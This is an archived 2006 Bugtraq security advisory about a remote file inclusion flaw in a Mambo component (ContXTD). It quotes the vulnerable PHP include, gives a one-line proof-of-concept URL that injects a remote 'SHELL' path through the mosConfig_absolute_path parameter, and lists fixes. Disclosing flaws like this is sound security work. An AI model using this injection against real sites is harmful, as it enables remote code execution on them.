| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060820015501.3969.qmail@securityfocus.com> Date: 20 Aug 2006 01:55:01 -0000 From: Outlaw@...a-security.net To: bugtraq@...urityfocus.com Subject: Mambo Component - Display MOSBot Manager Remote File Inclusion Vuln ########################################################################################### # Aria-Security.net Advisory # # Discovered by: O.U.T.L.A.W # # < www.Aria-security.net > # # Gr33t to: A.U.R.A & Hessam-X & Cl0wn & DrtRp # # # ########################################################################################### #Software: Mambo Components ContXTD #Attack method: Remote File Inclusion #Source: ** ensure this file is being included by a parent file */ defined( '_VALID_MOS' ) or die( 'Direct Access to this location is not allowed.' ); include_once( $mosConfig_absolute_path .'/includes/vcard.class.php' ); ************************************************************************************ #Proof of Concept: # #www.site.com/contxtd/contxtd.class.php?mosConfig_absolute_path=SHELL # # # #Solutions : #1 - If you have access on webserver turn register_globals in php.ini off #2 - You must give a value before put the value of variable in the include function or check and filter #unnormal entrance out . # # #Contact : Outlaw@...a-security.net
Powered by blists - more mailing lists